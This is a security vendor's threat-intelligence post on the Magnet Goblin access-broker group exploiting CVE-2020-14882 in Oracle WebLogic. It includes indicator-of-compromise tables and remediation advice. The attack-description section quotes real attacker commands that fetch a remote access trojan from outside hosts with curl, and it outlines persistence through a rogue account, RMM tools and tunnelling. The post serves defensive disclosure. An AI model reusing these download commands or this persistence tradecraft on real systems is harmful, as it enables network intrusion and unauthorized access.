Security operations · 8 MIN READ · AARON WALTON · NOV 12, 2024 · TAGS: Alert / Get technical / Threat hunting / vulnerability prioritization
TL;DR
- A threat actor known for targeting vulnerabilities is currently targeting CVE-2020-14882 in Oracle WebLogic
- This threat actor is financially motivated and is notorious for selling network access to ransomware gangs
- If you use Oracle WebLogic, we recommend patching and keeping it up to date
In September of 2024, we observed multiple instances of successful exploitation of Oracle WebLogic. These events occurred against multiple customers and appear to have leveraged the same CVE-2020-14882 vulnerability each time.
Based on our observations, each incident was the result of a single criminal group targeting servers. Checkpoint tracks this threat actor as Magnet Goblin. We are sharing this report to provide public information for continued awareness and tracking of this threat actor, and we want to ensure organizations (you!) can continue to secure your environment.
Oracle WebLogic vulnerability meets Magnet Goblin
In 2020, a critical vulnerability was identified in Oracle WebLogic (CVE-2020-14882). WebLogic is an application for hosting web apps—primarily eCommerce sites. However, researchers found that the service had a critical vulnerability that could be exploited with as little as a single web request.
That single web request would allow an attacker to perform a path traversal attack, allowing them to execute arbitrary code on the server. Severe vulnerabilities like this are frequently of interest to attackers as they can provide an easy means to access a network.
Magnet Goblin is one of those interested crime groups. This group is known as an initial access broker (IAB). An IAB gains access to networks and then sells that access to other bad actors. Magnet Goblin has been known to work with ransomware gangs, like the Cactus Ransomware gang.
A critical vulnerability like CVE-2020-14882 is a valuable vulnerability to an IAB like Magnet Goblin. If a bad actor understands how to exploit a vulnerability like this, then they can use it to compromise multiple networks, and make a pretty penny. And from our observation, this appears to be the case with this CVE.
Based on public reporting, Magnet Goblin has regularly targeted several critical vulnerabilities in the past few years. They’ve also been observed exploiting similar vulnerabilities in QlikSense (CVE-2023-41267, CVE-2023-41265, and CVE-2023-48365), Ivanti Connect Secure VPN (CVE-2023-46805 and CVE-2024-21887), and Magneto (CVE-2022-24086).
What we’ve seen
As mentioned previously, CVE-2020-14882 allows an actor to execute arbitrary code. In Magnet Goblin’s attacks, they execute the command “/bin/sh curl -k -o /tmp/nix hxxps://file[.]io/slzUjFaS9d94”. This command uses `curl` to retrieve a file from file[.]io and write it to the `tmp` directory as “nix”. In instances where the threat actor failed to pull the file from file[.]io, they used a SimpleHTTP server on their own systems, which looks like this: “/bin/sh -c curl -o /tmp/nix http://91.92.251[.]175:8383/nixrat”.
The attacker then uses these commands to pull their preferred tools onto the host because the vulnerability allows an attacker to execute arbitrary commands, but the functionality is limited. So, they are required to pull down additional tools to expand their access. Magnet Goblin uses the CVE to pull down a remote access tool (RAT) known as the NerBian RAT. This is their preferred tool they’ve used for several years, based on public reporting.
For an IAB like Magnet Goblin, the most important thing is to maintain network access. After deploying the NerBian RAT, they create a user account for themselves named `sqladmin`. This account is then used to connect to other machines and deploy more RATs—including remote monitoring and management (RMM) tools—within the environment to fly under the radar. The bad actor often relies on commercial or open-source tools to avoid detection. In this instance, they deployed:
- Panda Security Remote Control
- SimpleHelp
- N-Able Take Control
- Level IO Remote Access Client
IABs deploy multiple RATs and RMM tools to ensure they retain network access no matter what. If one is blocked or removed, they can rely on the others. They often use commercial or open source tools, with the expectation that they’ll have lower detection rates.
Magnet Goblin will also deploy a Ligolo tunnel. The Ligolo tunnel is used to hide the attacker’s access by routing it through a VPN. Thankfully, in the incidents we observed, the attacker didn’t get the chance to perform activity beyond deploying the RATs because their activity was identified and stopped by our SOC.
Ties to Magnet Goblin
Based on the tactics we identified in our customers’ environments, it appeared that Magnet Goblin was the bad actor present.
First, the actor appeared to consistently use Limenet infrastructure. In December 2023, eSentire reported a threat actor using the same IP address (91.92.251.175) in a similar incident to host a PowerShell script. According to their reporting, the threat actor also used several RATs for persistence, including Level IO Remote Access Client. In that incident, the actor gained access via a Qlik Sense vulnerability (CVE-2023-41266, CVE-2023-41265, or CVE-2023-48365).
The infrastructure the attacker used, Limenet, is a virtual private server provider that promises “complete anonymity,” according to their website. In practical terms, Limenet maintains minimal logs and information about their customers, so the service is ripe for abuse from IAB groups (like Magnet Goblin).
In both the incident reported by eSentire and the incidents we observed, the threat actor we leveraged `requestcatcher.com`. This service is an out-of-band application security testing (OAST) tool that lets users monitor their own web traffic—which the bad actor likely used to confirm successful web exploitation. Over the years, the attacker seems to consistently employ an OAST tool—and often the same tool—to validate their attacks.
Additionally, the NerBian RAT has historically been associated with Magnet Goblin, and may even be a custom malware of theirs. Their use of this RAT has been consistently reported over the last few years. DarkTrace reported that an attacker downloaded it from Limenet infrastructure and, in the incident we observed, the malware also had a hard-coded command-and-control server on Limenet infrastructure.
All of this evidence made us confident that we were dealing with Magnet Goblin.
Example indicators of compromise (IoCs)
The following table contains file hashes for the files that we observed. Like many RMM or RATs, the files may only be malicious if those tools aren’t expected in your environment.
| File name | SHA256 hash | Context |
|---|---|---|
| nix | 19e0aab36e15ddb57e684748ac73dbced7d08e35c5950fe53a3b4011cba1f7ac | NerBian RAT |
| 28wy.exe | 0798af37e50918997debfaf77bd8d657532bb0a6153dc812d6fcee7c999a3c17 | Unknown binary deployed by attacker |
| 28wy.exe | f9ea148faf6ffff9044d1b3b8c2f98882134890b0e4e17eb0518b9a1b013238a | Unknown binary deployed by attacker |
| agent.exe | 62b96e1b703f03e134085caa15942765b485417c6f99a2046d1ed7cfacc4aac4 | Ligolo Tunnel |
| ehorus_agent.exe | 7f4cc58b690d658d6528485637a9170e5b791630ebfd4a644119f02004f58a30 | Panda Remote Control Agent |
| ehorus_cmd.exe | a5b1c55fad336a74aa41c5b7075075d28c26df4fc0c43732f2e53123cc7e56ef | Panda Remote Control Agent |
| ehorus_cmd.exe | a5b1c55fad336a74aa41c5b7075075d28c26df4fc0c43732f2e53123cc7e56ef | Panda Remote Control Agent |
| ehorus_display.exe | 196a87a187e7969cc2ccdc713e7d030ab77feafc9b53619f1a4bfb4fda002f5a | Panda Remote Control Agent |
| ehorus_launcher.exe | 2e64bf8ca66e4363240e10dd8c85eabbf104d08aba60b307435ff5760d425a92 | Panda Remote Control Agent |
| ehorus_uit.exe | 247085a59535d4f68d6af35bc54a017e4f479f17ea96f20384ea0aeeb7ef3040 | Panda Remote Control Agent |
| winpty-agent.exe | 1438bb19667d54e7df9cd2edae0b879ab936e2a9533ef82069b019dfd3b8b661 | Panda Remote Control Agent |
| winpty-agent.exe | 1a896301784758c59722d1e61a0dd20a8269c460ed739277aeb4c98ca11b28a4 | Panda Remote Control Agent |
| level.exe | 54d737c9cd2c064ba462f6d406cdb0edecc6fd2ef72cb719c25100eda81f4044 | Level Remote Access Client |
| osqueryi.exe | 824808240cf683202a6c0592c9eb8eac9deb85e8f4c5b22d9d43472dfd8bfa78 | OSQuery Daemon Shell—used by Level Remote Access client |
| FileCacheServiceAgent.exe | ff7cc1a8e79e193a9d9d083afea4b06a98f48647b9d0e750d7dae4c657a77e93 | N-Able FileCacheServiceAgent |
| fmplugin.exe | 14b13a47e353e3c485bd57a62b85ed7e9affa3f5f1e7529efdc72e092939d894 | N-Able fm plugin |
| assetscan.exe | a9bce9eeb0b048f8a8b17b493cc8c6cdf581faeb42af46f0179119a34c0bdbac | N-Able assetscan.exe |
| MSP_Connect.exe | 21fdf6e9ed0fdc0c4ec70779c0be1007185bd5ec2c48a9cea3a73970ae29fe6d | N-Able Take Control Agent |
| NetworkManagementInstall.exe | 7e47226289726b16c27782bf35a07a3d020afe314957f1648f98a51091f88acd | N-Able Advanced Monitoring Agent Network Management |
| PME.Agent.exe | 207fe3368b801c0ca77864d03b29662b391d85b8655654a3ff91fea5830ff0b | N-Able PME.Agen |
| PMESetup.exe | d772e491c1f9ceded3042b3c5c7e1a2f9463746dc8adaaf382315239d744960c | N-Able Patch Management Service Controller |
| winagent.exe | 7b1fd98dd50b1474a8cbafd3ba885d21841bd9293fdcd3443c5fb299c7a85c38 | N-Able Advanced Monitoring Agent |
| RequestHandlerAgentSetup.exe | 32faa94eaf95670a8bf88361712c12392efe93e05d6bf611e86ce07ad1d14ee7 | N-Able Request Handler Agent |
| Remote Access.exe | 6f96b31495c07f54e174dcf990dd489e1d5f1863ffd52c026300d4115a9cad37 | SimpleHelp JWrapper Remote Access Client |
| Remote Access.exe | 78137fe94fd5450b2f2614af2b646f5d64da89b124fbbe8cb842d103ed14d729 | SimpleHelp Remote Access Client |
| Remote Access.exe | 78137fe94fd5450b2f2614af2b646f5d64da89b124fbbe8cb842d103ed14d729 | SimpleHelp Remote Access Client |
| RemoteAccessLauncher.exe | 6f96b31495c07f54e174dcf990dd489e1d5f1863ffd52c026300d4115a9cad37 | SimpleHelp Remote Access Client |
| RemoteAccessWinLauncher.exe | 78137fe94fd5450b2f2614af2b646f5d64da89b124fbbe8cb842d103ed14d729 | SimpleHelp Remote Access Client |
| elev_win.exe | 438ba43227682d7f46d9da5a739331ceb793ecf2038b20d5f0c9ff15eae8940b | SimpleHelp JWrapper Remote Access Client |
| remoteaccess-jar-with-depedencies.jar | bfb6dae17c901643a1888088e3971f3e85b2bb19a41d9978bcfa42910545be5a | Simple Help Remote Access JAR File |
| shcad.exe | 733aefd24574f9b25bd8cdc20246c6c5a37a95449add69f40583f6939de56ea9 | SimpleHelp Binary |
| StopSimpleGatewayService.exe | 78137fe94fd5450b2f2614af2b646f5d64da89b124fbbe8cb842d103ed14d729 | SimpleHelp Remote Access Client |
| windowslauncher.exe | 6f96b31495c07f54e174dcf990dd489e1d5f1863ffd52c026300d4115a9cad37 | SimpleHelp Remote Access Client |
| winpty-agent64.exe | 586a2d7d3092b364db3cbb5a7dbc83cf7ef233338c4172c1bae6587f8b374cab | SimpleHelp PTY Agent |
| cadasuser.exe | 57fb030e4ed08aef7eb505ab4c071cba98c4dc92166a3840e2a121dc75abedfe | SimpleHelp Utility |
The following table contains IP address and domains that were identified to be part of the malicious activity from the incidents that we investigated.
| IP/Domain | Context |
|---|---|
| 91.92.251[.]175 | Websever hosting attacker payloads. |
| 91.92.249[.]195 | IP address hard-coded into NerBian RAT binary. |
| 27-96-43-135[.]ipq[.]jp | VPN domain hosted at IPQ.JP leveraged by attacker to download payload. |
| bashupload[.]com | A short-lived file hosting service intended for single-use commands. Was weaponized in attack to host NerBian RAT. |
| file[.]io | A file hosting platform used by the attacker. |
| leprechaun[.]ehorus[.]com | Management panel for Panda Remote Control. |
| mail[.]157-230-41-8[.]cprapid[.]com | cPanel instance hosted in DigitalOcean, believed to be attacker-controlled. |
| 157.230.41[.]8 | IP address for cPanel instance hosted in Digital Ocean. |
| pruebas[.]pintacuario[.]mx | Management domain used by SimpleHelp. |
| requestcatcher[.]com | Out-of-band application security testing domain used to confirm successful exploitation. |
Vulnerability prioritization is key for effective remediation
New vulnerabilities are found every day, but not all of them are interesting to attackers. It’s important to prioritize remediating exploited vulnerabilities over those that just exist. Expel provides this information as part of our vulnerability prioritization offering. And we utilize information from a customer’s network scans to understand what vulnerabilities are in an environment, so we can then recommend patching prioritization. Our prioritization recommendations are based on public and private information on what vulnerabilities attackers are targeting. This means that teams that we support can ensure they are patching or mitigating vulnerabilities that attackers are targeting quickly, without needing to do arduous research themselves.
Magnet Goblin’s track record helps create a concrete example of an attacker that prioritizes learning about and using critical vulnerabilities. Warning about these vulnerabilities isn’t just theoretical. There are real attackers who make a living out of targeting these vulnerabilities. It’s important to have an effective plan for mitigating risk around vulnerabilities when they’re identified because they can quickly become problems for your business.
It’s important to monitor and detect unexpected RMM tools. The website https://lolrmm.io/ is a good tool with a robust list of RMM tools that are often leveraged for abuse. This kind of list is useful in building detections or performing hunts for unauthorized RMM tools.
If you have more questions on preventing or remediating similar CVEs, or want to learn more about our vulnerability prioritization or threat hunting offerings, you can reach out to us here.
